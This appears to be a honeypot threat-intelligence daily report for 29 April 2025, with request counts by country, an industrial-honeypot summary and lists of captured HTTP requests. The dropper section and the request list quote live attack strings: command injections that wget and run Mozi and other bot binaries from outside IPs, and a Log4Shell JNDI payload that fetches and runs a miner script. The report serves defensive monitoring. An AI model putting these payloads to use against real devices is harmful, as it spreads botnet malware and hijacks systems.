Table of Contents

Daily Report: 2025-04-29
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 37 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2039 requests were recorded during the day, originating from 3 different countries, with a peak of 422 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
DE	Singapore
US	Dubai
FR	Georgia
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
8.152.208.190	GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.90.162.234/wdjkalwww/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5 HTTP/1.1
122.5.101.10	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://122.5.101.10:43721/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
176.65.148.10	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://94.26.90.205/netgear.sh;chmod+777+netgear.sh;sh+netgear.sh;&curpath=/&currentsetting.htm=1; HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
121	4	POST /login HTTP/1.1
176	3	GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//109.236.80.84:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDUuMTU2LjIzLjEwNy9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly80NS4xNTYuMjMuMTA3L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z%7D%27%29 HTTP/1.1
251	2	GET /php_version.php HTTP/1.1
256	1	GET /socket.io/1/?t=1745903763331 HTTP/1.1
257	1	GET /socket.io/1/?t=1745903786082 HTTP/1.1
259	1	GET /config/index?time=1745931287017251127 HTTP/1.1
260	1	GET /api/bin/440393?time=1745931421787264049 HTTP/1.1
264	1	GET /api/bin/440393?time=1745946950703298303 HTTP/1.1
265	1	POST /api/user/binLookup?time=1745946951188903828 HTTP/1.1
266	1	GET /api/bin/440393?time=1745946963238662086 HTTP/1.1
267	1	POST /api/user/binLookup?time=1745946963781257909 HTTP/1.1
279	1	\x00\x0E8\x09!'
281	1	POST /wordpress/wp-login.php HTTP/1.1
303	1	\x04\x01\x01\xBB@\xE9\xA3c\x00
307	1	\x00\x0E8\xB1\xD3\xE6\x8E\xBB\x9CP\x98\x00\x00\x00\x00\x00
327	1	GET /spD5 HTTP/1.1
328	1	GET /FaeQ HTTP/1.1
334	1	GET /api/bin/440393?time=1745936899442181549 HTTP/1.1
335	1	POST /api/user/binLookup?time=1745936899985655652 HTTP/1.1
337	1	\x00\x0E82\xEB^x\x8A7\xD7A\x00\x00\x00\x00\x00
338	1	GET /api/bin/440393?time=1745947873870694936 HTTP/1.1
339	1	POST /api/user/binLookup?time=1745947874658826181 HTTP/1.1
340	1	GET /api/bin/440393?time=1745947923286268476 HTTP/1.1
341	1	POST /api/user/binLookup?time=1745947924461940368 HTTP/1.1
355	1	GET /config/index?time=1745931483014616739 HTTP/1.1
356	1	GET /api/bin/440393?time=1745931757882064655 HTTP/1.1
357	1	POST /api/user/binLookup?time=1745931758260028815 HTTP/1.1
360	1	\x00\x0E8%\x1C\xDD\xF4iA\x1D`\x00\x00\x00\x00\x00
361	1	GET /api/bin/440393?time=1745947012862189074 HTTP/1.1
362	1	POST /api/user/binLookup?time=1745947013526381854 HTTP/1.1
363	1	GET /api/bin/440393?time=1745947022185089449 HTTP/1.1
364	1	POST /api/user/binLookup?time=1745947022571583934 HTTP/1.1
369	1	GET /odinhttpcall1745903555 HTTP/1.1
371	1	GET /OdinHttpCall1745903555 HTTP/1.1
384	1	\x00\x0E8w\xAF>\x96\xD8K\xFC\x9F\x00\x00\x00\x00\x00
385	1	GET /Odin/http/call1745903555 HTTP/1.1
415	1	GET /socket.io/1/?t=1745903748980 HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	422	NL
1	421	US
2	234	GB
3	176	SC
4	97	FR
5	83	RU
6	81	DE
7	68	PL
8	66	HK
9	62	CH
10	51	BE
11	36	VN
12	35	CN
13	32	JP
14	23	AU
15	21	CA
16	17	SG
17	15	TR
18	10	AO
19	10	UA
20	9	PT
21	7	KR
22	7	BG
23	7	ZA
24	6	GH
25	6	VE
26	6	GE
27	4	IL
28	4	IN
29	3	ID
30	3	BR
31	3	MU
32	2	RO
33	2	ES
34	2	MC
35	2	LA
36	1	PA
37	1	PE
38	1	RS
39	1	AF
40	1	HN
41	1	AE

Report: 2025-04-28

28 April 2025·428 words

Repport Daily

Report: 2025-04-27

27 April 2025·571 words

Repport Daily

Report: 2025-04-26

26 April 2025·589 words

Repport Daily

	number_of_occurence	country_iso_code
0	422	NL
1	421	US
2	234	GB
3	176	SC
4	97	FR
5	83	RU
6	81	DE
7	68	PL
8	66	HK
9	62	CH
10	51	BE
11	36	VN
12	35	CN
13	32	JP
14	23	AU
15	21	CA
16	17	SG
17	15	TR
18	10	AO
19	10	UA
20	9	PT
21	7	KR
22	7	BG
23	7	ZA
24	6	GH
25	6	VE
26	6	GE
27	4	IL
28	4	IN
29	3	ID
30	3	BR
31	3	MU
32	2	RO
33	2	ES
34	2	MC
35	2	LA
36	1	PA
37	1	PE
38	1	RS
39	1	AF
40	1	HN
41	1	AE

	number_of_occurence	country_iso_code
0	422	NL
1	421	US
2	234	GB
3	176	SC
4	97	FR
5	83	RU
6	81	DE
7	68	PL
8	66	HK
9	62	CH
10	51	BE
11	36	VN
12	35	CN
13	32	JP
14	23	AU
15	21	CA
16	17	SG
17	15	TR
18	10	AO
19	10	UA
20	9	PT
21	7	KR
22	7	BG
23	7	ZA
24	6	GH
25	6	VE
26	6	GE
27	4	IL
28	4	IN
29	3	ID
30	3	BR
31	3	MU
32	2	RO
33	2	ES
34	2	MC
35	2	LA
36	1	PA
37	1	PE
38	1	RS
39	1	AF
40	1	HN
41	1	AE

Daily Report: 2025-04-29#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-04-29
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	422	NL
1	421	US
2	234	GB
3	176	SC
4	97	FR
5	83	RU
6	81	DE
7	68	PL
8	66	HK
9	62	CH
10	51	BE
11	36	VN
12	35	CN
13	32	JP
14	23	AU
15	21	CA
16	17	SG
17	15	TR
18	10	AO
19	10	UA
20	9	PT
21	7	KR
22	7	BG
23	7	ZA
24	6	GH
25	6	VE
26	6	GE
27	4	IL
28	4	IN
29	3	ID
30	3	BR
31	3	MU
32	2	RO
33	2	ES
34	2	MC
35	2	LA
36	1	PA
37	1	PE
38	1	RS
39	1	AF
40	1	HN
41	1	AE